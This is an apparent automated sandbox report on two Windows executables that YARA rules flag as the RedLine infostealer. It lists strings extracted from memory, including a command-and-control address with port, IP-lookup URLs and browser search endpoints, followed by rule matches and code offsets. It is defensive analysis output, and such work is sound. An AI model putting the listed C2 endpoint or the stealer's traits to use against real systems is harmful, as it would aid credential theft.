                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.248:55615/
                    Source: I5pvP0CU6M.exe, VcihjWRO.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: I5pvP0CU6M.exe, VcihjWRO.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: I5pvP0CU6M.exe, VcihjWRO.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: VcihjWRO.exe, 00000011.00000002.2427530855.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2219893866.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2314956361.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: VcihjWRO.exe, 00000011.00000002.2427530855.0000000003350000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: I5pvP0CU6M.exe, VcihjWRO.exe.0.drString found in binary or memory: http://tempuri.org/Gamee.xsd7PoisonRoulette.GameResource
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: I5pvP0CU6M.exe, I5pvP0CU6M.exe, 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: I5pvP0CU6M.exe, I5pvP0CU6M.exe, 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: I5pvP0CU6M.exe, I5pvP0CU6M.exe, 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: I5pvP0CU6M.exe, VcihjWRO.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: I5pvP0CU6M.exe PID: 2432, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: I5pvP0CU6M.exe PID: 6724, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: VcihjWRO.exe PID: 7224, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_010CDB8C0_2_010CDB8C
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_02B871780_2_02B87178
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_02B802280_2_02B80228
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_02B802180_2_02B80218
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_02B871680_2_02B87168
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058D61900_2_058D6190
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058DA8B00_2_058DA8B0
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058D78680_2_058D7868
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058DD7710_2_058DD771
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058D61830_2_058D6183
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058D03690_2_058D0369
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058D03780_2_058D0378
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058D9C900_2_058D9C90
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058D9CA00_2_058D9CA0
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058DA8A00_2_058DA8A0
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058D78590_2_058D7859
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058DAB390_2_058DAB39
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058DAB480_2_058DAB48
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 9_2_00EAE7B09_2_00EAE7B0
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 9_2_00EADC909_2_00EADC90
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 9_2_062796309_2_06279630
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 9_2_062744689_2_06274468
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 9_2_062712109_2_06271210
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 9_2_062733209_2_06273320
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 9_2_0627D1409_2_0627D140
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 9_2_0627DA309_2_0627DA30
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_00ECDB8C11_2_00ECDB8C
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_04EB717811_2_04EB7178
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_04EB022811_2_04EB0228
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_04EB021811_2_04EB0218
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_04EB716811_2_04EB7168
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_0700037811_2_07000378
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_0700618211_2_07006182
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_0700785911_2_07007859
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_0700A8B011_2_0700A8B0
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_0700D77111_2_0700D771
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_0700036911_2_07000369
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_07009C9011_2_07009C90
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_0700AB3911_2_0700AB39
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_0700AB4811_2_0700AB48
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_0700A8A011_2_0700A8A0
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_070217E011_2_070217E0
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_070236F811_2_070236F8
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_07029D5411_2_07029D54
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_07021C1311_2_07021C13
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_07021C1811_2_07021C18
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_070213A811_2_070213A8
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_070232C011_2_070232C0
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 11_2_0702A00011_2_0702A000
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_018CE7B017_2_018CE7B0
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_018CDC9017_2_018CDC90
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_06BC963017_2_06BC9630
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_06BC446817_2_06BC4468
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_06BC121017_2_06BC1210
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_06BCDA3017_2_06BCDA30
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_06BC386017_2_06BC3860
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_06BCD52817_2_06BCD528
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_06BCEAD817_2_06BCEAD8
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_06BCEACA17_2_06BCEACA
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_075EC34017_2_075EC340
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_075EF3F017_2_075EF3F0
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_075EE08817_2_075EE088
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_075E770017_2_075E7700
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_075E653817_2_075E6538
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_075EAA4817_2_075EAA48
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_075E103817_2_075E1038
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_075E102917_2_075E1029
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_075E08A817_2_075E08A8
                    Source: I5pvP0CU6M.exeStatic PE information: invalid certificate
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2227994252.0000000007472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000000.2114643519.0000000000900000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFDQB.exe@ vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2220979591.000000000453A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2219893866.0000000002FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2228697339.0000000007880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2215309661.00000000010DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002B12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exeBinary or memory string: OriginalFilenameFDQB.exe@ vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
